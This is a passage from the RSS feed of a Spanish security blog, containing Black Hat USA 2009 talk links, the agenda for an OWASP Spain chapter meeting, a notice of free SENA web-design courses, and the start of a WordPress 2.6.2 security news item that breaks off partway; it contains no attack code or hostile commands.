title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Bryan Sullivan</h3><h2>Defensive Rewriting: A New Take on <a
href="http://www.dragonjar.org/tag/xss" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XSS">XSS</a>/XSRF/Redirect-Phishing Defense</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/SULLIVAN/BHUSA09-Sullivan-URL-Rewriting-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/SULLIVAN/BHUSA09-Sullivan-URL-Rewriting-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Chris Tarnovsky</h3><h2>What the hell is inside there?</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/TARNOVSKY/BHUSA09-Tarnovsky-WhatsInsideSmartcard-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/TARNOVSKY/BHUSA09-Tarnovsky-WhatsInsideSmartcard-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Steve Topletz, Jonathan Logan and Kyle Williams</h3><h2>Global Spying: Realistic Probabilities in Modern Signals Intelligence</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/TOPLETZ/BHUSA09-Topletz-GlobalSpying-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/TOPLETZ/BHUSA09-Topletz-GlobalSpying-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Michael Tracy, Chris Rohlf, Eric Monti</h3><h2>Ruby for Pentesters</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/TRACY/BHUSA09-Tracy-RubyPentesters-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/TRACY/BHUSA09-Tracy-RubyPentesters-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Dustin &#8220;I)ruid&#8221; Trammell</h3><h2>Metasploit Telephony</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/TRAMMELL/BHUSA09-TrammelDruid-MetasploitTele-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/TRAMMELL/BHUSA09-TrammelDruid-MetasploitTele-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Eduardo Vela Nava, David Lindsay</h3><h2>Our Favorite XSS Filters and How to Attack Them</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Mario Vuksan, Tomislav Pericin</h3><h2>Fast &amp; Furious Reverse Engineering with TitanEngine</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/VUKSAN/BHUSA09-Vuksan-FastFurious-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/VUKSAN/BHUSA09-Vuksan-FastFurious-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Chris Weber</h3><h2>Unraveling Unicode: A Bag of Tricks for Bug Hunting</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/WEBER/BHUSA09-Weber-UnicodeSecurityPreview-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/WEBER/BHUSA09-Weber-UnicodeSecurityPreview-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Jeff Williams</h3><h2>Enterprise Java Rootkits</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/WILLIAMS/BHUSA09-Williams-EnterpriseJavaRootkits-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/WILLIAMS/BHUSA09-Williams-EnterpriseJavaRootkits-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/antivirus-gratis-para-mac-os-x-y-gnu-linux.xhtml" title="Antivirus gratis para Mac OS X y GNU Linux">Antivirus gratis para Mac OS X y GNU Linux</a></li><li><a
href="http://www.dragonjar.org/soporte-para-flash-y-java-en-el-iphone-ipod-touch.xhtml" title="Soporte para Flash y JAVA en el iPhone / iPod Touch">Soporte para Flash y JAVA en el iPhone / iPod Touch</a></li><li><a
href="http://www.dragonjar.org/instalar-android-en-el-iphone-o-ipod-touch.xhtml" title="Instalar Android en el iPhone o iPod Touch">Instalar Android en el iPhone o iPod Touch</a></li><li><a
href="http://www.dragonjar.org/listado-de-anti-virus-en-la-nube.xhtml" title="Listado de Anti Virus &#8220;en la Nube&#8221;">Listado de Anti Virus &#8220;en la Nube&#8221;</a></li><li><a
href="http://www.dragonjar.org/antivirus-para-mac-os-gratis.xhtml" title="Antivirus para Mac OS X Gratis">Antivirus para Mac OS X Gratis</a></li><li><a
href="http://www.dragonjar.org/licencia-gratis-del-panda-internet-security.xhtml" title="Licencia Gratis del Panda Internet Security">Licencia Gratis del Panda Internet Security</a></li><li><a
href="http://www.dragonjar.org/de-independencia-medios-de-comunicacion-twitter-y-facebook.xhtml" title="De independencia, Medios de Comunicación, Twitter y Facebook">De independencia, Medios de Comunicación, Twitter y Facebook</a></li><li><a
href="http://www.dragonjar.org/jailbreak-a-cualquier-iphone-ipod-touch-e-ipad.xhtml" title="Jailbreak a Cualquier iPhone, iPod Touch e iPad">Jailbreak a Cualquier iPhone, iPod Touch e iPad</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/memorias-del-black-hat-usa-2009.xhtml/feed</wfw:commentRss> <slash:comments>4</slash:comments> </item> <item><title>Charla de Seguridad Web Gratuita &#8211; Barcelona España</title><link>http://www.dragonjar.org/charla-de-seguridad-web-gratuita-barcelona-espana.xhtml</link> <comments>http://www.dragonjar.org/charla-de-seguridad-web-gratuita-barcelona-espana.xhtml#comments</comments> <pubDate>Sun, 10 May 2009 18:19:38 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Eventos en seguridad]]></category> <category><![CDATA[Ataques]]></category> <category><![CDATA[Congreso]]></category> <category><![CDATA[HTTP]]></category> <category><![CDATA[owasp]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Web]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=2253</guid> <description><![CDATA[El próximo Viernes 15 de Maryo de 2009 se realizara en el Ateneu Barcelonès de Barcelona, la quinta versión del OWASP Spain Chapter Meeting, una serie de charlas sobre seguridad web patrocinadas por el Proyecto OWASP. Las charlas no tienen ningún costo y para asistir únicamente es necesario que los asistentes envíen un correo a [...]]]></description> <content:encoded><![CDATA[<p>El próximo Viernes 15 de Maryo de 2009 se realizara en el <a
class="external text" title="http://anonym-url.com/go.php?to=http://maps.google.es/maps?f=q&amp;hl=es&amp;q=%22canuda,+6%22+barcelona&amp;sll=40.396764,-3.713379&amp;sspn=13.916328,29.619141&amp;ie=UTF8&amp;ll=41.385326,2.171248&amp;spn=0.003349,0.007231&amp;z=17&amp;om=1" rel="nofollow" href="http://anonym-url.com/go.php?to=http://maps.google.es/maps?f=q&amp;hl=es&amp;q=%22canuda,+6%22+barcelona&amp;sll=40.396764,-3.713379&amp;sspn=13.916328,29.619141&amp;ie=UTF8&amp;ll=41.385326,2.171248&amp;spn=0.003349,0.007231&amp;z=17&amp;om=1">Ateneu Barcelonès</a> de Barcelona, la quinta versión del <a
href="http://www.dragonjar.org/tag/owasp" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con owasp">OWASP</a> Spain Chapter Meeting, una serie de charlas sobre <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a> patrocinadas por el Proyecto <a
href="http://www.dragonjar.org/tag/owasp" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con owasp">OWASP</a>.</p><p
style="text-align: center;"><img
src="http://www.owasp.org/images/7/72/V_OWASP_Spain_Chapter_Meeting_Banner.png" alt="V OWASP Spain Chapter Meeting Banner Charla de Seguridad Web Gratuita   Barcelona España "  title="Charla de Seguridad Web Gratuita   Barcelona España " /></p><p>Las charlas no tienen ningún costo y para asistir únicamente es necesario que los asistentes envíen un correo a &#8220;vicente.aguilera@owasp.org&#8221; indicando en el asunto del mensaje la palabra &#8220;INSCRIPCIÓN&#8221;. Solicita el certificado de asistencia y consigue CPEs.</p><p>La programación es excelentes, con ponentes reconocidos en el sector de la <a
href="http://www.dragonjar.org/tag/seguridad-web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad Web">seguridad web</a> y unas temáticas que no tienen nada que envidiar a un <a
href="http://www.dragonjar.org/tag/congreso" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Congreso">congreso</a> internacional sobre el tema.<span
id="more-2253"></span></p><p><strong>PROGRAMACION DEL QUINTO OWASP SPAIN CHAPTER MEETING (BARCELONA)</strong></p><table
border="0" width="100%"><tbody><tr><td
width="10%" align="justify" valign="top" bgcolor="#c0e0e0">15:00h-15:30h</td><td
align="justify" bgcolor="#c0e0e0">Registro</td></tr><tr><td
width="10%" align="justify" valign="top" bgcolor="#b3ff99">15:30h-15:35h</td><td
align="justify" bgcolor="#b3ff99"><strong>Bienvenida y presentación del evento</strong>.<br
/> Vicente Aguilera Diaz. CISA, CISSP, ITIL, CEH Instructor, ECSP Instructor, OPST, OPSA.<br
/> <a
class="external text" title="http://anonym-url.com/go.php?to=http://www.owasp.org/index.php/Spain" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.owasp.org/index.php/Spain">OWASP Spain</a> Chapter Leader. Director del Departamento de Auditoría de <a
class="external text" title="http://anonym-url.com/go.php?to=http://www.isecauditors.com" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.isecauditors.com/">Internet Security Auditors</a>.</td></tr><tr><td
width="10%" align="justify" valign="top" bgcolor="#c0e0e0">15:35h-16:30h</td><td
align="justify" bgcolor="#c0e0e0"><strong>Sintonizar la función de seguridad con el negocio</strong>.<br
/> <em>Necesitamos una clara sintonía, por no decir armonía, entre la funciónde seguridad en tecnologías de la información dentro de una organización y el negocio, la verdadera razón de ser de la organización. La mera idea de negocio implica asumir unos riesgos. Sin embargo, la seguridad trata de mitigar riesgos. Esta presentación propone 8 medidas, basadas en más de 10 años de experiencia profesional, para conseguir esa sintonía entre el negocio y la seguridad.</em><br
/> Alberto Partida. CISA, CISSP, SANS GIAC Gold GSEC, Gold GCFW, Gold GCFA, GCIA y GREM.<br
/> Miembro del consejo asesor de <a
class="external text" title="http://anonym-url.com/go.php?to=http://www.sans.org" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.sans.org/">SANS Institute</a>.</td></tr><tr><td
width="10%" align="justify" valign="top" bgcolor="#b3ff99">16:30h-17:25h</td><td
align="justify" bgcolor="#b3ff99"><strong>LDAP Injection &amp; Blind LDAP Injection</strong>.<br
/> <em>Las técnicas de inyección de código son conocidas ámpliamente. Esta sesión se centrará en las posibilidades de las inyecciones de código LDAP en <a
href="http://www.dragonjar.org/tag/aplicaciones" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con aplicaciones">aplicaciones</a> web. Se verá, en un entorno de prueba, el impacto que pueden tener los ataques de inyección LDAP y la extracción de datos mediantes técnicas a ciegas.</em><br
/> Chema Alonso. Microsoft MVP Windows Security.<br
/> Consultor de Seguridad. <a
class="external text" title="http://anonym-url.com/go.php?to=http://www.informatica64.com" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.informatica64.com/">Informatica64</a>.</td></tr><tr><td
width="10%" align="justify" valign="top" bgcolor="#c0e0e0">17:25h-18:00h</td><td
align="justify" bgcolor="#c0e0e0">Coffe-break</td></tr><tr><td
width="10%" align="justify" valign="top" bgcolor="#b3ff99">18:00h-18:55h</td><td
align="justify" bgcolor="#b3ff99"><strong>Gestión de Incidentes de Seguridad Web en la Brigada de Investigación Tecnológica</strong>.<br
/> <em>En la primera parte de la ponencia conoceremos la estructura y funciones de la Brigada de Investigación Tecnológica y veremos algunos ejemplos de las distintas tipologias delictivas mas frecuentes, para centrarnos en la segunda parte en los incidentes de seguridad web que se denuncian habitualmente, sus consecuencias y el tratamiento que la Brigada da a cada uno de ellos, haciendo especial mención a aquellos aspectos que debe tener en cuenta un administrador para no perjudicar una posible investigación posterior.</em><br
/> Jorge Martín, Inspector. Jefe del grupo de Seguridad Lógica.<br
/> Brigada de Investigación Tecnológica. <a
class="external text" title="http://anonym-url.com/go.php?to=http://www.policia.es" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.policia.es/">Cuerpo Nacional de Policía</a>.</td></tr><tr><td
width="10%" align="justify" valign="top" bgcolor="#c0e0e0">18:55h-19:50h</td><td
align="justify" bgcolor="#c0e0e0"><strong>Extensión de módulos de pruebas de seguridad de la herramienta Webgoat de OWASP</strong>.<br
/> <em>Se hablará sobre la modificación del código fuente del framework para realizar tests de seguridad y permitir su internacionalización, así como varios módulos para realizar pruebas que hasta el momento no existían: el uso de cifrado predecibles, como es el caso del <a
href="http://www.dragonjar.org/tag/bug" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Bug">bug</a> aparecido en Debian el pasado año, y la explotación de desbordamientos de búfer en aplicaciones web.</em><br
/> Daniel Cabezas Molina. Technology and Security Risk Services (TSRS) Manager. <a
class="external text" title="http://anonym-url.com/go.php?to=http://www.ey.com" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.ey.com/">Ernst &amp; Young</a>.<br
/> Daniel Muñiz Marchante. Consultor. <a
class="external text" title="http://anonym-url.com/go.php?to=http://www.ey.com" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.ey.com/">Ernst &amp; Young</a></td></tr><tr><td
width="10%" align="justify" valign="top" bgcolor="#b3ff99">19:50h-20:25h</td><td
align="justify" bgcolor="#b3ff99"><strong>Mesa redonda</strong>.<br
/> <em>Se abrirá un debate sobre alguna temática relacionada con la seguridad y las aplicaciones web, entre los distintos ponentes y los invitados:</em><br
/> Francesc Rovirosa i Raduà. G.O d&#8217;Integració Tecnològica. Universitat Oberta de Catalunya (<a
class="external text" title="http://anonym-url.com/go.php?to=http://www.uoc.edu" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.uoc.edu/">UOC</a>)<br
/> Gabriel Martí.  Vocal de la Junta Directiva General. Responsable de los servicios ATInet. (<a
class="external text" title="http://anonym-url.com/go.php?to=http://www.ati.es" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.ati.es/">ATI</a>).</td></tr><tr><td
width="10%" align="justify" valign="top" bgcolor="#c0e0e0">20:25h-20:30h</td><td
align="justify" bgcolor="#c0e0e0"><strong>Despedida y cierre del evento</strong>.<br
/> Vicente Aguilera Diaz. CISA, CISSP, ITIL, CEH Instructor, ECSP Instructor, OPST, OPSA.<br
/> <a
class="external text" title="http://anonym-url.com/go.php?to=http://www.owasp.org/index.php/Spain" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.owasp.org/index.php/Spain">OWASP Spain</a> Chapter Leader. Director del Departamento de Auditoría de <a
class="external text" title="http://anonym-url.com/go.php?to=http://www.isecauditors.com" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.isecauditors.com/">Internet Security Auditors</a>.</td></tr></tbody></table><p>Los que puedan asistir a este evento, les pido el favor que envien las memorias a dragonjar (at) gmail.com para compartirlas con toda la comunidad.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/x5s-encuentra-fallos-xss-lfi-y-rfi-facilmente.xhtml" title="X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente">X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente</a></li><li><a
href="http://www.dragonjar.org/como-realizar-un-pentest.xhtml" title="¿Cómo se realiza un Pentest?">¿Cómo se realiza un Pentest?</a></li><li><a
href="http://www.dragonjar.org/memorias-del-vi-owasp-spain-chapter-meeting.xhtml" title="Memorias del VI OWASP Spain Chapter Meeting">Memorias del VI OWASP Spain Chapter Meeting</a></li><li><a
href="http://www.dragonjar.org/redos-denegacion-de-servicios-con-expresiones-regulares.xhtml" title="reDoS &#8211; Denegación de Servicios con Expresiones Regulares">reDoS &#8211; Denegación de Servicios con Expresiones Regulares</a></li><li><a
href="http://www.dragonjar.org/top-10-fallos-de-seguridad-en-aplicaciones-web.xhtml" title="TOP 10 Fallos de Seguridad en Aplicaciones Web">TOP 10 Fallos de Seguridad en Aplicaciones Web</a></li><li><a
href="http://www.dragonjar.org/video-ataque-de-envenamiento-de-cookies-cookie-poisoning.xhtml" title="Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)">Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/charla-de-seguridad-web-gratuita-barcelona-espana.xhtml/feed</wfw:commentRss> <slash:comments>4</slash:comments> </item> <item><title>Cursos Gratis de Diseño Web en el Sena Virtual</title><link>http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml</link> <comments>http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml#comments</comments> <pubDate>Sun, 22 Feb 2009 04:05:48 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Acceder]]></category> <category><![CDATA[adobe photoshop]]></category> <category><![CDATA[beca]]></category> <category><![CDATA[becas]]></category> <category><![CDATA[Cursos]]></category> <category><![CDATA[cursos gratis]]></category> <category><![CDATA[cursos virtuales]]></category> <category><![CDATA[Diseño]]></category> <category><![CDATA[Empresas]]></category> <category><![CDATA[Flash]]></category> <category><![CDATA[Gratis]]></category> <category><![CDATA[Informática]]></category> <category><![CDATA[JavaScript]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[Programación]]></category> <category><![CDATA[sen a]]></category> <category><![CDATA[SENA]]></category> <category><![CDATA[sena virtualç]]></category> <category><![CDATA[senavirtual]]></category> <category><![CDATA[Servicio]]></category> <category><![CDATA[virtual sena]]></category> <category><![CDATA[Web]]></category> <category><![CDATA[www.senavirtual.edu.co]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=2025</guid> <description><![CDATA[El SENA (Servicio Nacional de Aprendizaje), en su página www.senavirtual.edu.co o su plataforma sena sofia plus está implementando nuevos cursos virtuales sobre diseño web, entre las temáticas encontramos lenguajes como HTML, PHP, CSS , JAVASCRIPT, ademas de cursos para manejar los programas mas populares para el diseño  Photoshop, Autocad, Corel Draw, Flash,  Solid Edge, Dreamweaver [...]]]></description> <content:encoded><![CDATA[<p
style="text-align: center;"><img
class="aligncenter" title="Cursos Gratuitos de Programacion en el SENA VIRTUAL" src="http://img355.imageshack.us/img355/6241/sinttulo2cz9.jpg" alt="sinttulo2cz9 Cursos Gratis de Diseño Web en el Sena Virtual"  /></p><p>El SENA (Servicio Nacional de Aprendizaje), en su página <a
href="http://www.dragonjar.org/tag/wwwsenavirtualeduco" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con www.senavirtual.edu.co">www.senavirtual.edu.co</a> o su plataforma <strong>sena sofia plus</strong> está implementando nuevos <a
href="http://www.dragonjar.org/tag/cursos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Cursos">cursos</a> virtuales sobre diseño <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a>, entre las temáticas encontramos lenguajes como HTML, <a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">PHP</a>, CSS , JAVASCRIPT, ademas de <a
href="http://www.dragonjar.org/tag/cursos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Cursos">cursos</a> para manejar los programas mas populares para el diseño  Photoshop, Autocad, Corel Draw, <a
href="http://www.dragonjar.org/tag/flash" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Flash">Flash</a>,  Solid Edge, Dreamweaver y FrontPage.<span
id="more-2025"></span></p><p>Recordemos que al terminar los cursos en el sena virtual te dan un certificado del sena y entras automáticamente en la bolsa de empleo del SENA donde podrás ser llamado para trabajar en prestigiosas empresas del sector tecnológico del país.</p><p><script type="text/javascript">// <![CDATA[
google_ad_client = "pub-5474472965666825";
/* DJAR - Sena Enlaces */
google_ad_slot = "3038482239";
google_ad_width = 200;
google_ad_height = 90;
// ]]&gt;</script><br
/><script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script></p><p><strong><span
style="text-decoration: underline;"><span
style="color: #000000;">El listado de cursos que puedes realizar en el senavirtual sobre diseño web:</span></span></strong></p><p><span
style="color: #0000ff;"><a
href="http://www.dragonjar.org/tag/programacion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Programación">Programación</a> de páginas Web con HTML y JAVASCRIPT<br
/> Diseño Web con Macromedia Dreamweaver Mx<br
/> Manejo de <a
href="http://www.dragonjar.org/tag/adobe-photoshop" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con adobe photoshop">Adobe Photoshop</a><br
/> Manejo de Herramientas Informáticas: Solid Edge<br
/> Autocad 2D<br
/> Autocad 3D<br
/> Corel Draw &#8211; Utilización de herramientas de diseño Vectorial<br
/> Corel Draw &#8211; Textos y Organización de Objetos<br
/> Corel Draw &#8211; Transformación de Objetos y Efectos Especiales<br
/> <a
href="http://www.dragonjar.org/tag/desarrollo" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Desarrollo">Desarrollo</a> y publicación de <a
href="http://www.dragonjar.org/tag/sitios" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Sitios">sitios</a> Web utilizando la herramienta Frontpage<br
/> Diseño de Sitios Web, estrategias y usos de herramientas de diseño &#8211; Frontpage<br
/> Flash &#8211; Animacion en 2D</span><br
/><script type="text/javascript">// <![CDATA[
google_ad_client = "pub-5474472965666825";
/* DJAR - Sena Enlaces */
google_ad_slot = "3038482239";
google_ad_width = 200;
google_ad_height = 90;
// ]]&gt;</script><br
/><script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script></p><p>Para acceder a estos cursos gratuitos del SENA solo tienes que entrar al <a
href="http://anonym-url.com/go.php?to=http://sis.senavirtual.edu.co/oferta.php?areaid=10">enlace del sena virtual.</a></p><p
align=center><iframe
width="580" height="465" src="http://www.youtube.com/embed/43QnhMXDDfI" frameborder="0" allowfullscreen></iframe></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/cupos-disponibles-en-el-sena.xhtml" title="Cupos disponibles en el SENA">Cupos disponibles en el SENA</a></li><li><a
href="http://www.dragonjar.org/cursos-virtuales-gratis-en-el-sena.xhtml" title="www.senavirtual.edu.co – Cursos virtuales GRATIS en el Sena">www.senavirtual.edu.co – Cursos virtuales GRATIS en el Sena</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-de-seguridad-y-redes-en-el-sena-virtual.xhtml" title="Curso Gratis de Seguridad y Redes en el Sena Virtual">Curso Gratis de Seguridad y Redes en el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/curso-en-el-sena-virtual-sobre-auditoria-en-seguridad.xhtml" title="Curso en el Sena Virtual sobre Auditoria en Seguridad">Curso en el Sena Virtual sobre Auditoria en Seguridad</a></li><li><a
href="http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml" title="cursos de programacion gratuitos en el sena virtual">cursos de programacion gratuitos en el sena virtual</a></li><li><a
href="http://www.dragonjar.org/curso-gratuito-de-ingles-con-el-sena-virtual.xhtml" title="Curso Gratuito de Ingles con el Sena Virtual">Curso Gratuito de Ingles con el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/cursos-gratis-de-informatica-en-el-sena-virtual.xhtml" title="Sena Virtual Cursos Gratis de Informática">Sena Virtual Cursos Gratis de Informática</a></li><li><a
href="http://www.dragonjar.org/sena-sofia-plus.xhtml" title="SENA Sofia Plus">SENA Sofia Plus</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml/feed</wfw:commentRss> <slash:comments>50</slash:comments> </item> <item><title>2 Problemas graves que se solucionan en WordPress 2.6.2</title><link>http://www.dragonjar.org/2-problemas-graves-que-se-solucionan-en-wordpress-262.xhtml</link> <comments>http://www.dragonjar.org/2-problemas-graves-que-se-solucionan-en-wordpress-262.xhtml#comments</comments> <pubDate>Thu, 11 Sep 2008 01:44:36 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[WordPress]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1236</guid> <description><![CDATA[La versión 2.6.2 de WordPress lanzada ayer,soluciona dos graves agujeros de seguridad que pueden afectar seriamente a cualquier blog que utilice este popular CMS y permita el registro libre de usuarios. Ryan Boren fue el encargado  de dar a conocer las 2 vulnerabilidades (SQL Column Truncation y mt_rand()) en el blog oficial de desarrollo de [...]]]></description> <content:encoded><![CDATA[<p>La versión 2.6.2 de <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a> lanzada ayer,soluciona <a
href="http://wordpress.org/development/">dos graves agujeros de seguridad</a> que pueden afectar seriamente a cualquier blog que utilice este popular CMS y permita el registro libre de usuarios.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://img291.imageshack.us/img291/1580/wpmv0.jpg" alt="wpmv0 2 Problemas graves que se solucionan en WordPress 2.6.2"  title="2 Problemas graves que se solucionan en WordPress 2.6.2" /></p><p>Ryan Boren fue el encargado  de dar a conocer las 2 <a
href="http://www.dragonjar.org/tag/vulnerabilidades" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidades">vulnerabilidades</a> (<a
href="http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/">SQL Column Truncation</a> y <a
href="http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/">mt_rand()</a>) en el blog oficial de <a
